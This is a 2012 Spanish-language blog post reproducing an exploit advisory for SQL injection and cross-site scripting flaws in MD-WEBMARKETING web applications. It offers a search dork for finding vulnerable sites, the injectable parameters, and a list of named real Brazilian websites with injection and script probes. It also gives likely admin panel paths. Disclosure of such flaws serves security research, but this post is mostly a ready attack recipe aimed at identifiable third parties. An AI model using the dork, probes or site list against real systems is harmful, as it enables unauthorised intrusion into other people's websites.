martes, 6 de noviembre de 2012

MD-WEBMARKETING - SQL Injection/Cross Site Scripting Vulnerabilities




###############################################################################################################
# Exploit Title : MD-WEBMARKETING - SQL Injection/Cross Site Scripting Vulnerabilities
# Date : 06-11-2012
# Author : Caleb Bucker (Independent Security Researcher)
# Contact : https://twitter.com/CalebDrugs
# Website : www.calebbucker.blogspot.com
# Vendor       : MD Webmarketing
# URL Vendor : http://mdwebmarketing.com.br/
# Category : WebApps
# Dork : "Desenvolvido por: MD-WEBMARKETING" inurl:.php?id=
# Tested on: : BackTrack 5 R3
###############################################################################################################


###############################################################################################################

[~] Exploit:

http://www.site-web.com/***.php?id=                 [SQL Injection]

http://www.site-web.com/***.php?id=**********&busca= [Cross Site Scripting]

###############################################################################################################

[~] Example Sites SQL Injection:

http://www.acontecenews.com.br/exibe.php?id=65637'
http://www.revistapenseleve.com.br/exibe.php?id=1331'
http://itaporaagora.com.br/exibe.php?id=133050'
http://www.pierreadrileiloes.com.br/exibe.php?id=61712'
http://www.viaruralagro.com.br/loja/detalhes.php?id=24'

###############################################################################################################

[~] Example Sites Cross Site Scripting:

http://www.acontecenews.com.br/exibe.php?id=62587&cod_editorial=&url=index.php&pag=&busca="<h2>TEST</h2>
http://www.itaporaagora.com.br/exibe.php?id=132094&cod_editorial=&url=exibe.php&pag=&busca="<h2>TEST</h2>
http://www.deodapolisagora.com.br/exibe.php?id=131746&cod_editorial=&url=&pag=&busca="<h2>TEST</h2>

###############################################################################################################

[~] Screenshot:

http://imageshack.us/a/img443/2181/testwwh.png     [SQL Injection]
http://imageshack.us/a/img687/7656/test2sc.png    [Cross Site Scripting]

###############################################################################################################

[~] Location Panel Administrative:

http://www.site-web.com/adm
http://www.site-web.com/admin

###############################################################################################################

# Greet'z | @Pwnakil | @CLsecurity2011 & All my friend

###############################################################################################################

More Info: http://packetstormsecurity.org/files/117927/MD-Webmarketing-Cross-Site-Scripting-SQL-Injection.html

3 comentarios:

  1. Hola calebbucker, buen bug que has encontrado.

    Puedes pasar por mi web y creas otro blog de seguridad informatica.

    ResponderEliminar
  2. Hola calebbucker, buen bug que encontraste.

    Puedes pasar a mi web.

    ResponderEliminar